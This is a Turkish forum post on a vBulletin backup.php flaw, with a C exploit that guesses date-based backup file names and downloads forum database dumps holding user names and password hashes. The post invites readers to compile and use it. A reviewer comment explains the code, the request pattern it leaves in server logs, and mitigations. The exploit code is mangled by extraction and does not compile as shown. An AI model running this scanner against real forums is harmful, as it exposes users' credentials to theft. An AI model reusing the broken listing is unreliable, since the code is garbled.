VBulletin backup.php Açığı
VBulletin backup.php Açığı
backup.php scriptinde çok güzel bir açık var. vertabanı yedeğini alırker şifre istemior. eğer site sahibi veya admin default adlı klasörün uzantısıyla oynamamışsa bir üye bunu tahmin edebilip indirebiliyo. bu dosyanın içindede her kullanıcının kullanıcı adı şifre hashleri ve birçok özeli var Exploit ;
/*
 * Reviewer notes. The listing below is kept verbatim; it was damaged when the
 * page was extracted and does not compile as shown.
 *
 * What the code does, as far as the visible text shows:
 *  - getdate() .. getdate7() each subtract b days (86400 * b seconds) from
 *    time(NULL), format the result with a different strftime() pattern
 *    (different day/month/year orderings, separated by '-', '.' or nothing),
 *    print a "Searching:" line and return a pointer to a function-local
 *    static buffer.
 *  - main() requires argc == 5 (-h host, -p path), resolves the host with
 *    gethostbyname(), and then loops: for each day offset i and each of the
 *    seven date formats (d = 0..6) it opens a new TCP connection to port 80
 *    (SERVER_PORT) and sends one HEAD request for
 *    <path>/forumbackup-<date>.sql. A response containing "200 OK" is
 *    reported as a found backup and ends the program; a response containing
 *    "404" moves on to the next candidate name. The code sets no upper limit
 *    on the day offset.
 *
 * What this means for a forum operator:
 *  - The exposure is the one described in the text above: a database dump
 *    with a predictable, date-based name sits in a web-reachable directory
 *    and can be fetched without authentication. According to the text, the
 *    dump holds user names and password hashes.
 *  - In web-server logs this shows up as a run of HEAD requests for
 *    forumbackup-*.sql whose dates step backwards one day at a time, seven
 *    name variants per day, each on its own connection ("Connection: close"),
 *    typically answered with 404. The requests carry the User-Agent value set
 *    in the `http` header block in main(); that value is easy to change, so
 *    match on the request pattern rather than on the header alone.
 *  - Keep dumps outside the document root (or deny web access to *.sql and to
 *    the backup directory), give them non-guessable names, and delete old
 *    ones. If a dump was reachable, treat the hashes in it as disclosed and
 *    force password resets.
 */
#include #include #include #include #include #include #include #define SERVER_PORT 80 char *getdate(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%m-%d-%Y", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate2(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%Y-%d-%m", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate3(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d-%m-%Y", localtime(&ttt)); printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate4(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%m.%d.%Y", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate5(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%Y.%d.%m", localtime(&ttt)); // hals1 printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate6(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d.%m.%Y", localtime(&ttt)); // hals1 
printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } char *getdate7(int b){ static char datestring[40]; time_t ttt; int minustime; minustime=86400 * b; ttt=time(NULL)- minustime; strftime (datestring, sizeof(datestring), "%d%m%Y", localtime(&ttt)); // Tyn0r printf("Searching: forumbackup-%s.sqln", datestring); return(datestring); } main(int argc, char *argv[]) { char buffer[1000],host[255],path[255],dog[255],c; int sd, rc, i=0, d=0, b; struct sockaddr_in localAddr, servAddr; struct hostent *h; char *http = "Accept: */*rn" "Accept-Language: en-us,en;q=0.5rn" "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn" "User-Agent: we want your backups - milw0rmrn" "Connection: closernrn"; if ( argc != 5) { printf("vBulletin <= 3.0.8 Accessible Database Backup Searcher /str0ke ! milw0rm.comn"); printf("usage: %s -h hostname/ip -p /path/ n",argv[0]); exit(0); } while ((c = getopt (argc, argv, "h
:" != EOF) switch(c) { case ’h’: strncpy(host,optarg,sizeof(host)); break; case ’p’: strncpy(path,optarg,sizeof(path)); break; } h = gethostbyname(host); if(h==NULL) { printf("Unknown Host ’%s’n",host); exit(1); } printf("Trying To Connect To [%s]n",host); while(1){ servAddr.sin_family = h->h_addrtype; memcpy((char *) &servAddr.sin_addr.s_addr, h->h_addr_list[0], h->h_length); servAddr.sin_port = htons(SERVER_PORT); sd = socket(AF_INET, SOCK_STREAM, 0); if(sd<0) { perror("Can Not Open The Socketn"); exit(1); } localAddr.sin_family = AF_INET; localAddr.sin_addr.s_addr = htonl(INADDR_ANY); localAddr.sin_port = htons(0); rc = bind(sd, (struct sockaddr *) &localAddr, sizeof(localAddr)); if(rc<0) { printf("%d: cannot bind port TCP %un",sd,SERVER_PORT); perror("error "); exit(1); } rc = connect(sd, (struct sockaddr *) &servAddr, sizeof(servAddr)); if(rc<0) { perror("cannot connectn"); exit(1); } memset(buffer,0,sizeof(buffer)); if ( d == 0 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate(i),host,http); } else if ( d == 1 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate2(i),host,http); } else if ( d == 2 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate3(i),host,http); } else if ( d == 3 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate4(i),host,http); } else if ( d == 4 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate5(i),host,http); } else if ( d == 5 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate6(i),host,http); } else if ( d == 6 ) { snprintf(buffer,sizeof(buffer), "HEAD %s/forumbackup-%s.sql HTTP/1.1rnHost: %srn%s",path,getdate7(i),host,http); } rc = send(sd,buffer, strlen(buffer), 0); memset(buffer,0,sizeof(buffer)); while(1) { 
rc=recv(sd,buffer,sizeof(buffer),0); if(strstr(buffer,"404" break; if(strstr(buffer,"200 OK" { if ( d == 0 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate(i)); } if ( d == 1 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate2(i)); } if ( d == 2 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate3(i)); } if ( d == 3 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate4(i)); } if ( d == 4 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate5(i)); } if ( d == 5 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate6(i)); } if ( d == 6 ) { printf("Database backup found: %s%sforumbackup-%s.sqln", host, path, getdate7(i)); } exit(0); } memset(buffer,0,sizeof(buffer)); } close(sd); if ( d < 6 ) { d++; } else { d=0; i++; } } } Kaynak:turkishajan.org
Yukarıdaki kodu (C) Linux'ta derleyip kullanabilirsiniz.